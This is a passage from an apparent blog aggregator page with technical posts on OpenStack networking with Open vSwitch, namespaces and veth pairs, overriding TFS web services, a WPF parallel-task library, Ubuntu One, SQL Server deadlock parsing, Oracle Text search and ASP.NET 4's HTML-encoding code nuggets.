     cookie=0x0, duration=76681.36s, table=0, n_packets=68, n_bytes=7950, idle_age=17, hard_age=65534, priority=1 actions=NORMAL

    As we see, the port connected to the VM uses VLAN tag 1, while the port on the VM network (eth2) will be using tag 1000; OVS modifies the VLAN as packets flow from the VM to the physical interface. In OpenStack, the Open vSwitch agent takes care of programming the flows in Open vSwitch, so users do not have to deal with this at all (a hand-programmed example follows below). If you wish to learn more about how to program Open vSwitch, you can read more at http://openvswitch.org, looking at the documentation describing the ovs-ofctl command.
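    To make the flow programming concrete, here is a small sketch of how the first VLAN-rewriting flow from the dump above could be added by hand (again, the Open vSwitch agent normally does this for you; the port and VLAN numbers are taken from the dump):

    # rewrite VLAN 1000 to the local tag 1 for traffic entering on port 1,
    # then let the bridge forward it normally
    # ovs-ofctl add-flow br-int "priority=3,in_port=1,dl_vlan=1000,actions=mod_vlan_vid:1,NORMAL"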
    Network Namespaces (netns)

    Network namespaces are a very cool Linux feature that can be used for many purposes, and they are heavily used in OpenStack networking. Network namespaces are isolated containers which can hold a network configuration that is not seen from outside the namespace. A network namespace can be used to encapsulate specific network functionality or provide a network service in isolation, as well as simply help to organize a complicated network setup. The Oracle OpenStack Tech Preview uses the latest Unbreakable Enterprise Kernel R3 (UEK3), which provides complete support for netns.

    Let's see how namespaces work through a couple of examples. To control network namespaces we use the ip netns command.

    Defining a new namespace:

    # ip netns add my-ns
    # ip netns list
    my-ns

    As mentioned, the namespace is an isolated container; we can perform all the normal actions in the namespace context using the exec command, for example running the ifconfig command:

    # ip netns exec my-ns ifconfig -a
    lo        Link encap:Local Loopback
              LOOPBACK  MTU:16436  Metric:1
              RX packets:0 errors:0 dropped:0 overruns:0 frame:0
              TX packets:0 errors:0 dropped:0 overruns:0 carrier:0
              collisions:0 txqueuelen:0
              RX bytes:0 (0.0 b)  TX bytes:0 (0.0 b)

    We can run every command in the namespace context. This is especially useful for debugging with the tcpdump command; we can ping or ssh or define iptables, all within the namespace.

    Connecting the namespace to the outside world: there are various ways to connect into a namespace and between namespaces; we will focus on how this is done in OpenStack. OpenStack uses a combination of Open vSwitch and network namespaces: OVS defines the interfaces, and then we can add those interfaces to a namespace.

    So first let's add a bridge to OVS:

    # ovs-vsctl add-br my-bridge

    Now let's add a port on the OVS and make it internal:

    # ovs-vsctl add-port my-bridge my-port
    # ovs-vsctl set Interface my-port type=internal

    And let's connect it into the namespace:

    # ip link set my-port netns my-ns

    Looking inside the namespace:

    # ip netns exec my-ns ifconfig -a
    lo        Link encap:Local Loopback
              LOOPBACK  MTU:65536  Metric:1
              RX packets:0 errors:0 dropped:0 overruns:0 frame:0
              TX packets:0 errors:0 dropped:0 overruns:0 carrier:0
              collisions:0 txqueuelen:0
              RX bytes:0 (0.0 b)  TX bytes:0 (0.0 b)
    my-port   Link encap:Ethernet  HWaddr 22:04:45:E2:85:21
              BROADCAST  MTU:1500  Metric:1
              RX packets:0 errors:0 dropped:0 overruns:0 frame:0
              TX packets:0 errors:0 dropped:0 overruns:0 carrier:0
              collisions:0 txqueuelen:0
              RX bytes:0 (0.0 b)  TX bytes:0 (0.0 b)

    Now we can add more ports to the OVS bridge and connect them to other namespaces or other devices such as physical interfaces. Neutron uses network namespaces to implement network services such as DHCP, routing, gateway, firewall, load balancing and more. In the next post we will go into this in further detail.
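    As a quick sanity check of this wiring, one could give the namespaced port an address and bring it up; a minimal sketch (the address is hypothetical, and reaching anything beyond the namespace still requires connecting more ports to my-bridge):

    # configure and enable the port inside the namespace
    # ip netns exec my-ns ip addr add 10.10.10.1/24 dev my-port
    # ip netns exec my-ns ip link set dev my-port up
    # ip netns exec my-ns ip link set dev lo up
    # the address is only visible from within the namespace
    # ip netns exec my-ns ip addr show dev my-port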
    Linux Bridge and veth pairs

    A Linux bridge is used to connect the port from OVS to the VM: every port goes from the OVS bridge to a Linux bridge, and from there to the VM. The reason for using regular Linux bridges is security group enforcement. Security groups are implemented using iptables, and iptables rules can only be applied to Linux bridges, not to OVS bridges.

    Veth pairs are used extensively throughout the network setup in OpenStack and are also a good tool for debugging a network problem. A veth pair is simply a virtual wire, so veths always come in pairs. Typically one side of the veth pair connects to a bridge, and the other side connects to another bridge or is simply left as a usable interface. In this example we will create some veth pairs, connect them to bridges and test connectivity. This example uses a regular Linux server, not an OpenStack node.

    Creating a veth pair; note that we define names for both ends:

    # ip link add veth0 type veth peer name veth1
    # ifconfig -a
    .
    .
    veth0     Link encap:Ethernet  HWaddr 5E:2C:E6:03:D0:17
              BROADCAST MULTICAST  MTU:1500  Metric:1
              RX packets:0 errors:0 dropped:0 overruns:0 frame:0
              TX packets:0 errors:0 dropped:0 overruns:0 carrier:0
              collisions:0 txqueuelen:1000
              RX bytes:0 (0.0 b)  TX bytes:0 (0.0 b)
    veth1     Link encap:Ethernet  HWaddr E6:B6:E2:6D:42:B8
              BROADCAST MULTICAST  MTU:1500  Metric:1
              RX packets:0 errors:0 dropped:0 overruns:0 frame:0
              TX packets:0 errors:0 dropped:0 overruns:0 carrier:0
              collisions:0 txqueuelen:1000
              RX bytes:0 (0.0 b)  TX bytes:0 (0.0 b)
    .
    .

    To make the example more meaningful, we will create the following setup:

    veth0 => veth1 => br-eth3 => eth3 ======> eth2 on another Linux server

    br-eth3 – a regular Linux bridge which will be connected to veth1 and eth3
    eth3 – a physical interface with no IP on it, connected to a private network
    eth2 – a physical interface on the remote Linux box, connected to the private network and configured with the IP 50.50.50.51

    Once we create the setup, we will ping 50.50.50.51 (the remote IP) through veth0 to test that the connection is up:

    # brctl addbr br-eth3
    # brctl addif br-eth3 eth3
    # brctl addif br-eth3 veth1
    # brctl show
    bridge name     bridge id               STP enabled     interfaces
    br-eth3         8000.00505682e7f6       no              eth3
                                                            veth1
    # ifconfig veth0 50.50.50.50
    # ping -I veth0 50.50.50.51
    PING 50.50.50.51 (50.50.50.51) from 50.50.50.50 veth0: 56(84) bytes of data.
    64 bytes from 50.50.50.51: icmp_seq=1 ttl=64 time=0.454 ms
    64 bytes from 50.50.50.51: icmp_seq=2 ttl=64 time=0.298 ms

    When the naming is not as obvious as in the previous example and we don't know which veth interfaces are paired, we can use the ethtool command to figure it out. The ethtool command returns an index we can look up using the ip link command, for example:

    # ethtool -S veth1
    NIC statistics:
         peer_ifindex: 12
    # ip link
    .
    .
    12: veth0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc pfifo_fast state UP qlen 1000

    Summary

    That's all for now. We quickly reviewed OVS, network namespaces, Linux bridges and veth pairs. These components are heavily used in the OpenStack network architecture we are exploring, and understanding them well will be very useful when reviewing the different use cases. In the next post we will look at how the OpenStack network is laid out, connecting the virtual machines to each other and to the external world. @RonenKofman
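    One more veth property worth knowing when experimenting like this: the two ends live and die together, so cleanup of the pair created above is a single command.

    # deleting either end of a veth pair removes its peer as well
    # ip link delete veth0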

    Read the article

  • Overwriting TFS Web Services

    - by javarg
    In this blog I will share a technique I used to intercept TFS Web Services calls. This technique is very invasive and requires you to overwrite the default TFS Web Services behavior. I only recommend taking such an approach when other means of TFS extensibility fail to provide the same functionality (this is not a supported TFS extensibility point). For instance, intercepting and aborting a Work Item change operation could be implemented using this approach (consider the TFS Subscribers functionality before taking this approach; check Martin's post about subscribers). So let's get started.

    The technique consists of versioning the TFS Web Services .asmx service classes. If you look into TFS's ASMX services, you will notice that versioning is supported by creating a class hierarchy between different product versions. For instance, let's take the Work Item management service .asmx. Check the following .asmx file located at:

    %Program Files%\Microsoft Team Foundation Server 2010\Application Tier\Web Services\_tfs_resources\WorkItemTracking\v3.0\ClientService.asmx

    The .asmx references the class Microsoft.TeamFoundation.WorkItemTracking.Server.ClientService3:

    <%-- Copyright (c) Microsoft Corporation. All rights reserved. --%>
    <%@ webservice language="C#" Class="Microsoft.TeamFoundation.WorkItemTracking.Server.ClientService3" %>

    The inheritance hierarchy for this service class follows the naming convention used for service versioning (ClientService3, ClientService2, ClientService). We will need to overwrite the latest service version provided by the product (in this case ClientService3 for TFS 2010). The following example intercepts and analyzes WorkItem fields. Suppose we need to validate state changes with more advanced logic than the validations/constraints provided by the process template. Important: back up the original .asmx file and create one of your own.
    1. Create a Visual Studio Web App Project and include a new ASMX Web Service in the project.

    2. Add the following references to the project (check the folder %Program Files%\Microsoft Team Foundation Server 2010\Application Tier\Web Services\bin\):

    Microsoft.TeamFoundation.Framework.Server.dll
    Microsoft.TeamFoundation.Server.dll
    Microsoft.TeamFoundation.WorkItemTracking.Client.QueryLanguage.dll
    Microsoft.TeamFoundation.WorkItemTracking.Server.DataAccessLayer.dll
    Microsoft.TeamFoundation.WorkItemTracking.Server.DataServices.dll

    3. Replace the default service implementation with something similar to the following code:

    /// <summary>
    /// Inherit from ClientService3 to overwrite the default implementation
    /// </summary>
    [WebService(Namespace = "http://schemas.microsoft.com/TeamFoundation/2005/06/WorkItemTracking/ClientServices/03",
        Description = "Custom Team Foundation WorkItemTracking ClientService Web Service")]
    public class CustomTfsClientService : ClientService3
    {
        [WebMethod, SoapHeader("requestHeader", Direction = SoapHeaderDirection.In)]
        public override bool BulkUpdate(
            XmlElement package,
            out XmlElement result,
            MetadataTableHaveEntry[] metadataHave,
            out string dbStamp,
            out Payload metadata)
        {
            var xe = XElement.Parse(package.OuterXml);

            // We only intercept WorkItem updates (we can easily extend this sample to capture any operation).
            var wit = xe.Element("UpdateWorkItem");
            if (wit != null)
            {
                if (wit.Attribute("WorkItemID") != null)
                {
                    int witId = (int)wit.Attribute("WorkItemID");
                    // With this Id we can query TFS for more detailed information,
                    // using the TFS Client API (assuming the WIT already exists).
                    var stateChanged =
                        wit.Element("Columns").Elements("Column").FirstOrDefault(c => (string)c.Attribute("Column") == "System.State");
                    if (stateChanged != null)
                    {
                        var newStateName = stateChanged.Element("Value").Value;
                        if (newStateName == "Resolved")
                        {
                            throw new Exception("Cannot change state to Resolved!");
                        }
                    }
                }
            }

            // Finally, we call the base method implementation
            return base.BulkUpdate(package, out result, metadataHave, out dbStamp, out metadata);
        }
    }

    4. Build your solution and overwrite the original .asmx with a new one referencing your new service version (don't forget to back it up first; a sketch of the replacement directive appears below).

    5. Copy your project's .dll into the following path: %Program Files%\Microsoft Team Foundation Server 2010\Application Tier\Web Services\bin

    6. Try saving a WorkItem into the Resolved state. Enjoy!
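    For reference on step 4, the replacement .asmx is just a one-line directive pointing at the new class; a minimal sketch, assuming the class above is compiled into an assembly named CustomTfsServices (both the class placement and the assembly name are hypothetical):

    <%-- hypothetical replacement for ClientService.asmx --%>
    <%@ WebService Language="C#" Class="CustomTfsClientService, CustomTfsServices" %>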

    Read the article

  • ParallelWork: Feature rich multithreaded fluent task execution library for WPF

    - by oazabir
    ParallelWork is a free, open source helper class that lets you run multiple pieces of work on parallel threads, get success, failure and progress updates on the WPF UI thread, wait for work to complete, abort all work (in case of shutdown), queue work to run after a certain time, and chain parallel work one after another. It's more convenient than using .NET's BackgroundWorker because you don't have to declare one component per work item, nor do you need to declare event handlers to receive notifications and carry additional data through private variables (see the BackgroundWorker comparison sketch at the end of this post). You can safely pass objects produced on a different thread to the success callback. Moreover, you can wait for work to complete before you do a certain operation, and you can abort all parallel work while it is in flight. If you are building a highly responsive WPF UI where you have to carry out multiple jobs in parallel yet want full control over their completion and cancellation, then the ParallelWork library is the right solution for you.

    I am using the ParallelWork library in my PlantUmlEditor project, which is a free open source UML editor built on WPF. You can see some realistic use of the ParallelWork library there. Moreover, the test project comes with 400 lines of Behavior Driven Development flavored tests that confirm it really does what it says it does. The source code of the library is part of the "Utilities" project in the PlantUmlEditor source code hosted at Google Code.

    The library comes in two flavors. One is the ParallelWork static class, which has a collection of static methods that you can call. The other is the Start class, which is a fluent wrapper over the ParallelWork class to make code more readable and aesthetically pleasing.

    ParallelWork allows you to start work immediately on a separate thread, or you can queue work to start after some duration. You can start immediate work in a new thread using the following methods:

    void StartNow(Action doWork, Action onComplete)
    void StartNow(Action doWork, Action onComplete, Action<Exception> failed)

    For example:

    ParallelWork.StartNow(() =>
    {
        workStartedAt = DateTime.Now;
        Thread.Sleep(howLongWorkTakes);
    },
    () =>
    {
        workEndedAt = DateTime.Now;
    });

    Or you can use the fluent way, Start.Work:

    Start.Work(() =>
    {
        workStartedAt = DateTime.Now;
        Thread.Sleep(howLongWorkTakes);
    })
    .OnComplete(() =>
    {
        workCompletedAt = DateTime.Now;
    })
    .Run();

    Besides simple execution of work on a parallel thread, you can have the parallel thread produce some object and then pass it to the success callback by using these overloads:

    void StartNow<T>(Func<T> doWork, Action<T> onComplete)
    void StartNow<T>(Func<T> doWork, Action<T> onComplete, Action<Exception> fail)

    For example:

    ParallelWork.StartNow<Dictionary<string, string>>(
        () =>
        {
            test = new Dictionary<string, string>();
            test.Add("test", "test");
            return test;
        },
        (result) =>
        {
            Assert.True(result.ContainsKey("test"));
        });

    Or, the fluent way:

    Start<Dictionary<string, string>>.Work(() =>
    {
        test = new Dictionary<string, string>();
        test.Add("test", "test");
        return test;
    })
    .OnComplete((result) =>
    {
        Assert.True(result.ContainsKey("test"));
    })
    .Run();

    You can also start work to happen after some time using these methods:

    DispatcherTimer StartAfter(Action onComplete, TimeSpan duration)
    DispatcherTimer StartAfter(Action doWork, Action onComplete, TimeSpan duration)

    You can use this to perform some timed operation on the UI thread, as well as perform some operation on a separate thread after some time.
    ParallelWork.StartAfter(
        () =>
        {
            workStartedAt = DateTime.Now;
            Thread.Sleep(howLongWorkTakes);
        },
        () =>
        {
            workCompletedAt = DateTime.Now;
        },
        waitDuration);

    Or, the fluent way:

    Start.Work(() =>
    {
        workStartedAt = DateTime.Now;
        Thread.Sleep(howLongWorkTakes);
    })
    .OnComplete(() =>
    {
        workCompletedAt = DateTime.Now;
    })
    .RunAfter(waitDuration);

    There are several overloads of these functions that take an exception callback for handling exceptions or receive progress updates from the background thread while work is in progress. For example, I use it in my PlantUmlEditor to perform a background update of the application:

    // Check if there's a newer version of the app
    Start<bool>.Work(() =>
    {
        return UpdateChecker.HasUpdate(Settings.Default.DownloadUrl);
    })
    .OnComplete((hasUpdate) =>
    {
        if (hasUpdate)
        {
            if (MessageBox.Show(Window.GetWindow(me),
                "There's a newer version available. Do you want to download and install?",
                "New version available",
                MessageBoxButton.YesNo,
                MessageBoxImage.Information) == MessageBoxResult.Yes)
            {
                ParallelWork.StartNow(() =>
                {
                    var tempPath = System.IO.Path.Combine(
                        Environment.GetFolderPath(Environment.SpecialFolder.ApplicationData),
                        Settings.Default.SetupExeName);
                    UpdateChecker.DownloadLatestUpdate(Settings.Default.DownloadUrl, tempPath);
                }, () => { },
                (x) =>
                {
                    MessageBox.Show(Window.GetWindow(me),
                        "Download failed. When you run next time, it will try downloading again.",
                        "Download failed",
                        MessageBoxButton.OK,
                        MessageBoxImage.Warning);
                });
            }
        }
    })
    .OnException((x) =>
    {
        MessageBox.Show(Window.GetWindow(me), x.Message,
            "Download failed",
            MessageBoxButton.OK,
            MessageBoxImage.Exclamation);
    });

    The above code shows how to get exception callbacks on the UI thread so that you can take the necessary actions there. Moreover, it shows how you can chain two parallel works to happen one after another.

    Sometimes you want to do some parallel work when the user does some activity on the UI. For example, you might want to save the file in an editor every 10 seconds while the user is typing. In such a case, you need to make sure you don't queue another parallel work every 10 seconds while one is already queued; you should start a new work only when there's no other background work going on. Here's how you can do it:

    private void ContentEditor_TextChanged(object sender, EventArgs e)
    {
        if (!ParallelWork.IsAnyWorkRunning())
        {
            ParallelWork.StartAfter(SaveAndRefreshDiagram, TimeSpan.FromSeconds(10));
        }
    }

    If you want to shut down your application and make sure no parallel work is going on, then you can call the StopAll() method:

    ParallelWork.StopAll();

    If you want to wait for parallel work to complete, you can call WaitForAllWork(TimeSpan timeout). It will block the current thread until all parallel work completes or the timeout period elapses:

    result = ParallelWork.WaitForAllWork(TimeSpan.FromSeconds(1));

    The result is true if all parallel work completed; if it's false, then the timeout period elapsed and the parallel work did not all complete.

    For details on how this library is built and how it works, please read the following CodeProject article:

    ParallelWork: Feature rich multithreaded fluent task execution library for WPF
    http://www.codeproject.com/KB/WPF/parallelwork.aspx

    If you like the article, please vote for me.
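    For contrast with the first StartNow example above, here is roughly what the same fire-and-forget pattern costs with the stock .NET BackgroundWorker (a sketch reusing the post's own workStartedAt/workEndedAt variables):

    using System.ComponentModel;

    var worker = new BackgroundWorker();
    // DoWork runs on a thread-pool thread
    worker.DoWork += (s, e) =>
    {
        workStartedAt = DateTime.Now;
        Thread.Sleep(howLongWorkTakes);
    };
    // RunWorkerCompleted is marshaled back to the calling (UI) thread;
    // failures arrive via e.Error instead of a dedicated failure callback
    worker.RunWorkerCompleted += (s, e) =>
    {
        if (e.Error == null) { workEndedAt = DateTime.Now; }
    };
    worker.RunWorkerAsync();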

    Read the article

  • Linq Tutorial

    - by SAMIR BHOGAYTA
    Microsoft LINQ Tutorials
    http://www.deitel.com/ResourceCenters/Programming/MicrosoftLINQ/Tutorials/tabid/2673/Default.aspx

    Introducing C# 3 – Part 4: LINQ
    http://www.programmersheaven.com/2/CSharp3-4

    101 LINQ Samples
    http://msdn.microsoft.com/en-us/vcsharp/aa336746.aspx

    What is LINQ
    http://www.dotnetspider.com/forum/173039-what-linq-net.aspx

    Beginner's Guides
    http://www.progtalk.com/viewarticle.aspx?articleid=68
    http://www.programmersheaven.com/2/CSharp3-4
    http://dotnetslackers.com/articles/csharp/introducinglinq1.aspx

    Using LINQ
    http://weblogs.asp.net/scottgu/archive/2006/05/14/446412.aspx

    Step-by-Step Articles
    http://www.codeproject.com/KB/linq/linqtutorial.aspx
    http://www.codeproject.com/KB/linq/linqtutorial2.aspx
    http://www.codeproject.com/KB/linq/linqtutorial3.aspx
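    As a taste of what these tutorials cover, in the spirit of the 101 LINQ Samples above, a minimal query expression looks like this:

    int[] numbers = { 5, 4, 1, 3, 9, 8, 6, 7, 2, 0 };
    var lowNums = from n in numbers
                  where n < 5
                  select n;   // yields 4, 1, 3, 2, 0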

    Read the article

  • [MISC GEEKERY] Lucid Lynx to Come Loaded with Ubuntu One Music Store

    - by Vivek
    Ubuntu 10.04 (code name Lucid Lynx) will come loaded with the Ubuntu One Music Store. Rhythmbox will have the Ubuntu One Music Store integrated into it, and it will allow users to download purchased music to their local machine.

    Ubuntu One Music Store

    Users will be able to access the Ubuntu One Music Store from the sidebar of Rhythmbox. The music store is a web page that opens in the Rhythmbox player, with albums listed on its home page. The Ubuntu One Music Store is powered by 7digital, a leading digital B2B media delivery company based in London and operating globally. Canonical, the company behind Ubuntu, has partnered with 7digital to bring the music store to its users, integrating it with Rhythmbox and its cloud storage service Ubuntu One, which was launched last year.

    The home screen of the Ubuntu One Music Store displays popular albums along with browse and search functionality. You can search for artists, tracks, albums, or a combination of all three. Users will also be able to browse the store alphabetically or by music genre. Once you select a specific artist, all their available albums are arranged in a grid. Once an album is selected, you'll be able to download specific songs or the whole album, and you can preview each song for 60 seconds. You'll be able to buy tracks using a credit card or PayPal.

    The purchased tracks will be visible under Library \ Purchased from Ubuntu One. The downloaded tracks are also synced with your Ubuntu One account, which means you'll be able to access your tracks from anywhere on the web. The default Ubuntu One account comes with 2 GB of free storage; you can purchase additional space if you need it.

    All the music is in MP3 format, which is not supported by default in Ubuntu. However, you can get MP3 playback functionality through the GStreamer multimedia framework (a sample install command follows below).

    Conclusion

    All in all, the Ubuntu One Music Store is a positive move to enhance the user experience and bring Ubuntu closer to regular users. It should also let Canonical generate some revenue in collaboration with 7digital.

    Ubuntu One Music Store Wiki
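    On the MP3 note above, one common way to add decoding support on 10.04 is the GStreamer "ugly" plugin set (a sketch; the package name assumes the standard Lucid repositories):

    # install the GStreamer plugins that provide MP3 decoding
    sudo apt-get install gstreamer0.10-plugins-ugly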

    Read the article

  • Parsing Extended Events xml_deadlock_report

    - by Michael Zilberstein
    Jonathan Kehayias and Paul Randal posted great articles more than a year ago on how to monitor historical deadlocks using the Extended Events system_health default trace. Both tried to fix, on the fly, the bug in the xml output that caused failures in xml validation. Today I've found out that their version isn't bulletproof either. So here is the fixed one: SELECT CAST(xest.target_data AS XML) xml_data, * INTO #ring_buffer_data FROM sys.dm_xe_session_targets xest INNER...(read more)
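    The excerpt cuts off mid-query. The join it begins follows the standard shape for pulling the system_health ring buffer; a minimal sketch (not the author's fixed version, which is behind the "read more" link):

    SELECT CAST(xest.target_data AS XML) AS xml_data
    INTO #ring_buffer_data
    FROM sys.dm_xe_session_targets AS xest
    INNER JOIN sys.dm_xe_sessions AS xes
            ON xes.address = xest.event_session_address
    WHERE xes.name = 'system_health'
      AND xest.target_name = 'ring_buffer';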

    Read the article

  • A couple of nice features when using OracleTextSearch

    - by kyle.hatlestad
    If you have your UCM/URM instance configured to use the Oracle 11g database as the search engine, you can use OracleTextSearch as the search definition. OracleTextSearch uses the advanced features of Oracle Text for indexing and searching. This includes the ability to specify metadata fields to be optimized for the search index, fast rebuilding, and index optimization. If you are on UCM 10g, you'll need to load the OracleTextSearch component that is available in the CS10gR35UpdateBundle component on the support site (patch #6907073). If you are on 11g, no component is needed. Then you specify the search indexer name with the configuration flag SearchIndexerEngineName=OracleTextSearch. Please see the docs for other configuration settings and setup instructions.

    So I thought I would highlight a couple of other unique features available with OracleTextSearch.

    The first is the Drill Down feature. This feature allows you to specify metadata fields whose results are broken down by value against the total results, as with the file extensions in the graphic referenced above, each with a count; you then just click a link to drill into that result set. This setting is perfect for option list fields and ones with a distinct set of possible values. By default, it will use the fields Type, Security Group, and Account (if enabled), but you can also specify your own fields. In 10g, you can use the following configuration entry:

    DrillDownFields=xWebsiteObjectType,dExtension,dSecurityGroup,dDocType

    And in 11g, you can specify it through the Configuration Manager applet. Simply click on Advanced Search Design, highlight the field to filter, click Edit, and check 'Is a filter category'.

    The other feature you get with OracleTextSearch is search snippets. These snippets show the occurrence of the search term in the context of its usage, very much like Google displays its results. If you are on 10g, this is enabled by default. If you are on 11g, you need to turn the feature on with the following configuration entry:

    OracleTextDisableSearchSnippet=false

    Once enabled, you can add the snippets to your search results. Go to Change View -> Customize and add a new search result view. In the Available Fields in the Special section, select Snippet and move it to the Main or Additional Information. If you want to include the snippets with the Classic results, you can add the idoc variable <$srfDocSnippet$> to display them. One caveat is that this can affect search performance on large collections, so plan the infrastructure accordingly.

    Read the article

  • New <%: %> Syntax for HTML Encoding Output in ASP.NET 4 (and ASP.NET MVC 2)

    - by ScottGu
    [In addition to blogging, I am also now using Twitter for quick updates and to share links. Follow me at: twitter.com/scottgu]

    This is the nineteenth in a series of blog posts I'm doing on the upcoming VS 2010 and .NET 4 release. Today's post covers a small, but very useful, new syntax feature being introduced with ASP.NET 4 – the ability to automatically HTML encode output within code nuggets. This helps protect your applications and sites against cross-site script injection (XSS) and HTML injection attacks, and enables you to do so using a nice concise syntax.

    HTML Encoding

    Cross-site script injection (XSS) and HTML injection attacks are two of the most common security issues that plague web-sites and applications. They occur when hackers find a way to inject client-side script or HTML markup into web-pages that are then viewed by other visitors to a site. This can be used both to vandalize a site and to enable hackers to run client-script code that steals cookie data and/or exploits a user's identity on a site to do bad things.

    One way to help mitigate cross-site scripting attacks is to make sure that rendered output is HTML encoded within a page. This helps ensure that any content that might have been input/modified by an end-user cannot be output back onto a page containing tags like <script> or <img> elements. ASP.NET applications (especially those using ASP.NET MVC) often rely on <%= %> code-nugget expressions to render output, and developers today often use the Server.HtmlEncode() or HttpUtility.HtmlEncode() helper methods within these expressions to HTML encode the output before it is rendered (see the plain-text sketch below). While this works fine, there are two downsides:

    It is a little verbose
    Developers often forget to call the HtmlEncode method

    New <%: %> Code Nugget Syntax

    With ASP.NET 4 we are introducing a new code expression syntax (<%: %>) that renders output like <%= %> blocks do – but which also automatically HTML encodes it before doing so. This eliminates the need to explicitly HTML encode content, and lets you accomplish the same thing with more concise code. We chose the <%: %> syntax so that it would be easy to quickly replace existing instances of <%= %> code blocks. It also enables you to easily search your code-base for <%= %> elements to find and verify any cases where you are not using HTML encoding within your application, to ensure that you have the correct behavior.

    Avoiding Double Encoding

    While HTML encoding content is often a good best practice, there are times when the content you are outputting is meant to be HTML or is already encoded – in which case you don't want to HTML encode it again. ASP.NET 4 introduces a new IHtmlString interface (along with a concrete implementation: HtmlString) that you can implement on types to indicate that their value is already properly encoded (or otherwise examined) for displaying as HTML, and that therefore the value should not be HTML-encoded again. The <%: %> code-nugget syntax checks for the presence of the IHtmlString interface and will not HTML encode the output of the code expression if its value implements this interface. This allows developers to avoid having to decide on a per-case basis whether to use <%= %> or <%: %> code-nuggets. Instead you can always use <%: %> code nuggets, and then have any properties or data-types that are already HTML encoded implement the IHtmlString interface.
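    The original post illustrated these syntaxes with code screenshots; in plain text, the contrast looks roughly like this (Model.UserName is a hypothetical value used for illustration):

    <%-- pre-ASP.NET 4: encode explicitly --%>
    <div><%= Server.HtmlEncode(Model.UserName) %></div>

    <%-- ASP.NET 4: the colon syntax HTML encodes automatically --%>
    <div><%: Model.UserName %></div>

    <%-- already-encoded content: wrap it in an HtmlString so <%: %> leaves it alone --%>
    <div><%: new HtmlString("<em>trusted markup</em>") %></div>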
    Using ASP.NET MVC HTML Helper Methods with <%: %>

    For a practical example of where this HTML encoding escape mechanism is useful, consider scenarios where you use HTML helper methods with ASP.NET MVC. These helper methods typically return HTML. For example, the Html.TextBox() helper method returns markup like <input type="text"/>. With ASP.NET MVC 2 these helper methods now by default return HtmlString types – which indicates that the returned string content is safe for rendering and should not be encoded by <%: %> nuggets. This allows you to use these methods within both <%= %> and <%: %> code nugget blocks. In both cases the HTML content returned from the helper method will be rendered to the client as HTML – and the <%: %> code nugget will avoid double-encoding it.

    This enables you to default to always using <%: %> code nuggets instead of <%= %> code blocks within your applications. If you want to be really hardcore, you can even create a build rule that searches your application for <%= %> usages and flags any cases it finds as an error, to enforce that HTML encoding always takes place.

    Scaffolding ASP.NET MVC 2 Views

    When you use VS 2010 (or the free Visual Web Developer 2010 Express) you'll find that the views scaffolded using the "Add View" dialog now by default always use <%: %> blocks when outputting any content. For example, below I've scaffolded a simple "Edit" view for an article object. Note the three usages of <%: %> code nuggets for the label, textbox, and validation message (all output with HTML helper methods).

    Summary

    The new <%: %> syntax provides a concise way to automatically HTML encode content and then render it as output. It allows you to make your code a little less verbose, and to easily check/verify that you are always HTML encoding content throughout your site. This can help protect your applications against cross-site script injection (XSS) and HTML injection attacks.

    Hope this helps,

    Scott

    Read the article

< Previous Page | 502 503 504 505 506 507 508 509 510 511 512 513  | Next Page >